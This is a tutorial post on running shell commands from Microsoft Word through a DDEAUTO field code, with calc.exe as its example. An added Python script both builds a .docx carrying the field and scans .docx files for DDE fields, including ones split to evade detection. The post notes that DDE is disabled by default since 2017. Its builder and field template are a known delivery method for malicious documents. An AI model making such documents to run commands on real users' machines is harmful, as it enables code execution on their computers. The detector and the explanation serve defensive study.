
Execute Shell From MSWord

Step 1.) Open MS Word with a blank document.

Step 2.) Click Insert -> Quick Parts -> Field.

Step 3.) In the Field dialog select "= (Formula)" and click OK.

Step 4.) Select the field text that appears, right-click it and choose "Toggle Field Codes".

Step 5.) Replace the field code inside the curly braces with the following (keep the braces; the backslashes are doubled because a single backslash starts a field switch in Word):
DDEAUTO c:\\Windows\\System32\\cmd.exe "/k [shell command that you want to run]"


Explained:
DDEAUTO -> the field keyword that tells Word this is a DDE (Dynamic Data Exchange) field and that it should be updated, and therefore executed, automatically when the document is opened (a plain DDE field only runs when the user updates the field).
c:\\Windows\\System32\\cmd.exe -> the DDE "server" application Word is asked to start.
The text inside the double quotes "        " is passed to that program as its command line; /k makes cmd.exe run the command and keep the window open.
For example: {DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"}

Save the document.
Open it on your own computer. Word prompts first to update the fields and then to start cmd.exe; select "Yes" both times.
Finally Calculator opens.
Note that Microsoft disabled DDE in Word by default in December 2017 (Security Advisory ADV170021), so on a patched installation nothing runs unless DDE has been re-enabled in the Trust Center / registry settings.

TRY IT!!
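As an added example (not part of the original post), the Python script below shows what the field from step 5 looks like once the document is saved, and how a defender finds it. A .docx is a ZIP archive and the field code is stored in word/document.xml inside w:instrText runs, so the script writes a minimal .docx with the same DDEAUTO field using only the standard library, and it also scans any .docx for DDE/DDEAUTO fields, reassembling field codes that were split across several runs (a known evasion). The output file name and the placeholder result text are assumptions made for this example.

```python
"""Build a .docx carrying a DDEAUTO field, then scan .docx files for DDE fields.

Added example for this post, not part of the original. Standard library only.
In WordprocessingML a field code lives either in the w:instr attribute of
<w:fldSimple> or, for complex fields, in <w:instrText> runs between
<w:fldChar w:fldCharType="begin"/> and <w:fldChar w:fldCharType="end"/>.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# The field exactly as typed into Word in step 5 of the post (backslashes are
# doubled because a single backslash introduces a field switch).
DDE_FIELD = r'DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe"'

# Word is case-insensitive and a DDE field may be nested inside another field,
# so look for the keyword anywhere in the instruction, not only at its start.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)

_CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    "</Types>"
)
_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    "</Relationships>"
)


def build_docx(field_code, placeholder="field result not updated"):
    """Return bytes of a minimal .docx whose only paragraph is a complex field.

    field_code is a string or a list of strings; a list is written as several
    <w:instrText> runs (e.g. ["DDE", "AUTO ..."]), which Word still joins into
    one field code.  placeholder is the assumed, never-updated field result.
    """
    chunks = [field_code] if isinstance(field_code, str) else list(field_code)
    instr_runs = "".join(
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % escape(c)
        for c in chunks
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="%s"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        "<w:r><w:t>%s</w:t></w:r>"
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p></w:body></w:document>"
    ) % (W_NS, instr_runs, escape(placeholder))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", _CONTENT_TYPES)
        zf.writestr("_rels/.rels", _RELS)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


def iter_field_codes(part_xml):
    """Yield every field instruction found in one WordprocessingML part."""
    root = ET.fromstring(part_xml)
    for fld in root.iter(W + "fldSimple"):
        yield fld.get(W + "instr", "")
    depth, pieces = 0, []
    for el in root.iter():  # document order, so runs arrive in sequence
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1  # fields may nest; collect until the outer end
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    yield "".join(pieces)
                    pieces = []
        elif el.tag == W + "instrText" and depth > 0:
            pieces.append(el.text or "")


def scan_docx(docx):
    """Return [(part name, field code)] for each DDE/DDEAUTO field in a .docx.

    docx is a path, a file-like object or the raw bytes.  Every XML part under
    word/ is checked because fields also live in headers, footers and notes.
    """
    if isinstance(docx, bytes):
        docx = io.BytesIO(docx)
    hits = []
    with zipfile.ZipFile(docx) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                codes = list(iter_field_codes(zf.read(name)))
            except ET.ParseError:
                continue  # malformed part: nothing Word would treat as fields
            for code in codes:
                if DDE_RE.search(code):
                    hits.append((name, code.strip()))
    return hits


if __name__ == "__main__":
    with open("dde_demo.docx", "wb") as fh:  # assumed output file name
        fh.write(build_docx(DDE_FIELD))
    print(scan_docx("dde_demo.docx"))
```

Running the script writes dde_demo.docx, which opens in Word exactly like the hand-built document from steps 1-5, and prints the detected field. The scanner deliberately concatenates instrText runs before matching, so splitting "DDE" and "AUTO" across runs, or changing the keyword's case, does not hide the field.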
